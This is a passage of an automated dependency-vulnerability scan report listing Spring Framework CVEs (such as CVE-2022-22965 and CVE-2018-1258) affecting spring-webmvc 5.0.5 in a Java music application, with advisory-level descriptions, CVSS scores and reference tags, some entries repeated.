OSSINDEX - [CVE-2020-5421] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421 OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421 af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security@pivotal.io - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - THIRD_PARTY_ADVISORY security@pivotal.io - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22950 suppress
n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2023-20861 suppress
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-11039 suppress
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11039] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039 OSSIndex - https://jira.spring.io/browse/SPR-16836 OSSIndex - https://pivotal.io/security/cve-2018-11039 af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22968 suppress
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-22970 suppress
In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2021-22096 (OSSINDEX) suppress
In Spring Framework versions 5.3.0 - 5.3.10, 5.2.0 - 5.2.17, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. CWE-117 Improper Output Neutralization for Logs
CVSSv3:
Base Score: MEDIUM (4.300000190734863) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: spring-webmvc-5.0.5.RELEASE.jarDescription:
Spring Web MVC License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-webmvc-5.0.5.RELEASE.jar
MD5: 34339930599a55ee87ac9bfd08d1aca3
SHA1: 0a7fd53c7ad06b0fa7dd4ff347de1b2dc508739e
SHA256: 9898bb0d8f3109434afc0e92754cc867ac6963227e9ca0100b7e4f2bf11a5658
Evidence Type Source Name Value Confidence Vendor central artifactid spring-webmvc Highest Vendor central groupid org.springframework Highest Vendor file name spring-webmvc High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name servlet Low Vendor jar package name springframework Low Vendor jar package name web Low Vendor Manifest automatic-module-name spring.webmvc Medium Vendor pom artifactid spring-webmvc Low Vendor pom developer email jhoeller@pivotal.io Low Vendor pom developer id jhoeller Medium Vendor pom developer name Juergen Hoeller Medium Vendor pom groupid org.springframework Highest Vendor pom name Spring Web MVC High Vendor pom organization name Spring IO High Vendor pom organization url http://projects.spring.io/spring-framework Medium Vendor pom url spring-projects/spring-framework Highest Product central artifactid spring-webmvc Highest Product file name spring-webmvc High Product hint analyzer product springsource_spring_framework Highest Product jar package name servlet Low Product jar package name web Low Product Manifest automatic-module-name spring.webmvc Medium Product Manifest Implementation-Title spring-webmvc High Product pom artifactid spring-webmvc Highest Product pom developer email jhoeller@pivotal.io Low Product pom developer id jhoeller Low Product pom developer name Juergen Hoeller Low Product pom groupid org.springframework Highest Product pom name Spring Web MVC High Product pom organization name Spring IO Low Product pom organization url http://projects.spring.io/spring-framework Low Product pom url spring-projects/spring-framework High Version central version 5.0.5.RELEASE Highest Version Manifest Implementation-Version 5.0.5.RELEASE High Version pom version 5.0.5.RELEASE Highest
CVE-2022-22965 suppress
CISA Known Exploited Vulnerability: Product: VMware Spring Framework Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability Date Added: 2022-04-04 Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. Required Action: Apply updates per vendor instructions. Due Date: 2022-04-25 Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - US_GOVERNMENT_RESOURCE security@vmware.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security@vmware.com - MITIGATION,VENDOR_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-1258 suppress
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258 OSSIndex - https://jira.spring.io/browse/SPR-16757 OSSIndex - https://pivotal.io/security/cve-2018-1258 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-22259 suppress
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-11040 suppress
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040 OSSIndex - https://jira.spring.io/browse/SPR-16798 OSSIndex - https://pivotal.io/security/cve-2018-11040 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-15756 suppress
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-15756] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756 OSSIndex - https://pivotal.io/security/cve-2018-15756 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5398 suppress
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.6) Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2018-1257 suppress
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression, denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-1257] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257 OSSIndex - https://jira.spring.io/browse/SPR-16731 OSSIndex - https://pivotal.io/security/cve-2018-1257 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5421 suppress
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.6) Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N References:
OSSINDEX - [CVE-2020-5421] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421 OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421 af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security@pivotal.io - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - PATCH,THIRD_PARTY_ADVISORY security@pivotal.io - THIRD_PARTY_ADVISORY security@pivotal.io - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-22950 suppress
n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
CVE-2023-20861 suppress
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2018-11039 suppress
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11039] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039 OSSIndex - https://jira.spring.io/browse/SPR-16836 OSSIndex - https://pivotal.io/security/cve-2018-11039 af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5397 (OSSINDEX) suppress
Spring Framework, versions 5.2.x prior to 5.2.3 are vulnerable to CSRF attacks through CORS preflight requests that target Spring MVC (spring-webmvc module) or Spring WebFlux (spring-webflux module) endpoints. Only non-authenticated endpoints are vulnerable because preflight requests should not include credentials and therefore requests should fail authentication. However a notable exception to this are Chrome based browsers when using client certificates for authentication since Chrome sends TLS client certificates in CORS preflight requests in violation of spec requirements. No HTTP body can be sent or received as a result of this attack.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2020-5397 for details CWE-352 Cross-Site Request Forgery (CSRF)
